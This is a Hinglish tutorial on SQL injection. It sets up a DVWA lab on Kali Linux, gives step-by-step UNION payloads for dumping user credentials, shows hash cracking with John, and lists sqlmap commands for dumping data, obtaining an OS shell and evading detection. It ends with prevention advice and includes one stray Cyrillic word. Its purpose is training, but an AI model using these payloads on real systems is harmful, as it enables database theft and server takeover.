SQL Injection Tutorial: Complete Lab Guide with DVWA and SQLMap

SQL Injection Tutorial: Complete Lab Guide with DVWA and SQLMap

SQL injection OWASP Top 10 mein consistently rank karta hai aur web application security ka most critical vulnerability hai. Yeh SQL injection tutorial aapko practical hands-on lab ke saath SQLi attacks ki complete understanding dega — from basic concepts to advanced exploitation techniques.

SQL Injection Kya Hai

SQL injection ek code injection technique hai jahan attacker database queries ko manipulate karta hai through unsanitized user input. Yeh vulnerability tab create hota hai jab application user input ko directly SQL query mein concatenate karta hai bina proper validation ke.

SQL injection prevention India mein web developers ke liye top priority hai kyunki Indian e-commerce sites, banking portals, aur government applications consistently SQL injection attacks se target hote hain.

SQL Basics Quick Review

SQL injection samajhne ke liye SQL ka basic understanding zaroori hai:

SQL databases mein data tables, rows, aur columns mein store hota hai. SELECT queries data retrieve karti hain. INSERT new data add karti hai. UPDATE existing data modify karti hai. DELETE data remove karti hai.

Ek typical vulnerable login query:

```sql

SELECT * FROM users WHERE username='admin' AND password='password123'

```

Jab user input directly is query mein concatenate hota hai bina sanitization ke:

```sql

SELECT * FROM users WHERE username='input_from_user' AND password='input_from_user'

```

Yeh vulnerable hai kyunki attacker input mein special characters inject kar sakta hai.

SQL Injection Types

In-Band SQLi

Sabse common type hai jahan same channel data retrieval aur attack execution dono ke liye use hota hai.

Error-Based SQL Injection database errors se information extract karta hai. Union-Based SQL Injection UNION operator se multiple SELECT statements combine karta hai.

Inferential SQLi (Blind SQLi)

Isme data transfer nahi hota, response patterns se conclusions nikaalte hain.

Boolean-Based Blind SQLi true/false responses se data nikaalna. Time-Based Blind SQLi delays (SLEEP function) se data inference karna.

Out-of-Band SQLi

Alternative channels DNS ya HTTP requests use karta hai jab in-band data retrieval possible nahi hai.

Lab Setup: DVWA on Kali Linux

DVWA Install Karne Ka Tarika

DVWA (Damn Vulnerable Web Application) practice ke liye excellent platform hai.

Apache aur MySQL start karein:

```bash

sudo service apache2 start

sudo service mysql start

```

DVWA clone karein:

```bash

sudo git clone https://github.com/digininja/DVWA.git /var/www/html/dvwa

```

Permissions set karein:

```bash

sudo chmod -R 755 /var/www/html/dvwa

```

Config file setup karein:

```bash

cd /var/www/html/dvwa/config

cp config.inc.php.dist config.inc.php

```

Browser mein http://localhost/dvwa open karein aur setup page par jayein.

DVWA Security Level ko "low" set karein — yeh maximum vulnerabilities enable karega practice ke liye.

Manual SQL Injection Lab Walkthrough

DVWA par SQL Injection page kholein.

Step 1: Identify the Injection Point

Browser mein DVWA SQL Injection page kholein. User ID field mein test karein:

Normal input: 1

Expected output: User information display hoga

Single quote test: 1'

Agar database error aata hai toh SQL injection vulnerability confirm hai.

Step 2: Determine Number of Columns

1' ORDER BY 1--

1' ORDER BY 2--

1' ORDER BY 3--

Jab tak error na aaye increment karein. Last successful number hi column count hai.

Step 3: Find Vulnerable Columns

1' UNION SELECT NULL,NULL--

Agar columns match nahi karte toh:

1' UNION SELECT 1,2,3--

Jo columns screen par display hote hain woh vulnerable hain.

Step 4: Extract Database Information

Database version:

1' UNION SELECT NULL,@@version--

Current database:

1' UNION SELECT NULL,database()--

Current user:

1' UNION SELECT NULL,user()--

Step 5: Enumerate Databases

1' UNION SELECT schema_name,NULL FROM information_schema.schemata--

Step 6: Enumerate Tables

1' UNION SELECT table_name,NULL FROM information_schema.tables WHERE table_schema='dvwa'--

Aapko probably "users" table dikhegi.

Step 7: Extract Column Names

1' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--

Aapko user_id, first_name, last_name, aur password columns milne chahiyein.

Step 8: Dump User Credentials

1' UNION SELECT user_id,password FROM users--

Password hashes mil jaayenge jo aap crack kar sakte hain John the Ripper se:

```bash

john --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt

```

SQLMap Automation

SQLMap SQL injection ko automate karta hai aur powerful features provide karta hai.

Basic SQLMap Scan

```bash

sqlmap -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=your_session_id" --batch

```

--batch flag automatic mode enable karta hai bina user interaction ke.

Get Databases

```bash

sqlmap -u "http://target" --cookie="security=low; PHPSESSID=xxx" --dbs

```

Get Tables from Specific Database

```bash

sqlmap -u "http://target" --cookie="security=low; PHPSESSID=xxx" -D dvwa --tables

```

Get Columns from Table

```bash

sqlmap -u "http://target" --cookie="security=low; PHPSESSID=xxx" -D dvwa -T users --columns

```

Dump Complete Data

```bash

sqlmap -u "http://target" --cookie="security=low; PHPSESSID=xxx" -D dvwa -T users --dump

```

OS Shell Gain Karna

```bash

sqlmap -u "http://target" --cookie="security=low; PHPSESSID=xxx" --os-shell

```

SQLMap Advanced Options

--level=1 to 5 risk level increase karta hai. --risk=1 to 3 payload aggression define karta hai. --random-agent random User-Agent use karta hai detection se bachne ke liye. --proxy=http://proxy:8080 proxy through scan karne ke liye. --tamper=space2comment bypass techniques apply karne ke liye.

SQL Injection Prevention

Parameterized Queries (Prepared Statements)

```python

# Vulnerable (Never do this)

query = "SELECT * FROM users WHERE id='" + user_id + "'"

# Secure (Parameterized Query)

query = "SELECT * FROM users WHERE id = ?"

cursor.execute(query, (user_id,))

```

Input Validation

Whitelist approach use karein — sirf expected characters allow karein. Special characters (', ", ;, --, etc.) ko sanitize karein. Length limits set karein.

Stored Procedures

Database level stored procedures use karein jo parameterized queries implement karein.

Least Privilege Principle

Database user jo application use karta hai uski privileges minimum rakhein. Sirf required operations (SELECT, INSERT, UPDATE) allow karein. DELETE aur DROP sirf admin accounts par restricted honi chahiyein.

Web Application Firewall (WAF)

ModSecurity jaise WAF SQL injection patterns ko block kar sakte hain. WAF additional layer provide karta hai lekin primary prevention input validation hai.

SQL Injection Tutorial Summary

SQL injection web security ka most dangerous vulnerability hai. Is tutorial mein cover kiya:

• SQL injection kya hai aur kyun critical hai
• Different SQL injection types — In-band, Inferential, Out-of-band
• DVWA lab setup on Kali Linux
• Manual SQL injection step by step exploitation
• SQLMap automation for faster testing
• Prevention methods — parameterized queries, input validation, least privilege

SQL injection tutorial seekhne ke baad уверен practical labs practice karein. DVWA ke alawa bhi TryHackMe aur PortSwigger Academy par SQL injection challenges hain. Real-world applications par sirf authorized testing karein.

Cyber Defence ka web application security testing course SQL injection aur bhi advanced web vulnerabilities ko hands-on labs ke saath cover karta hai. CTF writeups hack the box challenges mein bhi SQL injection techniques ka practice kar sakte hain.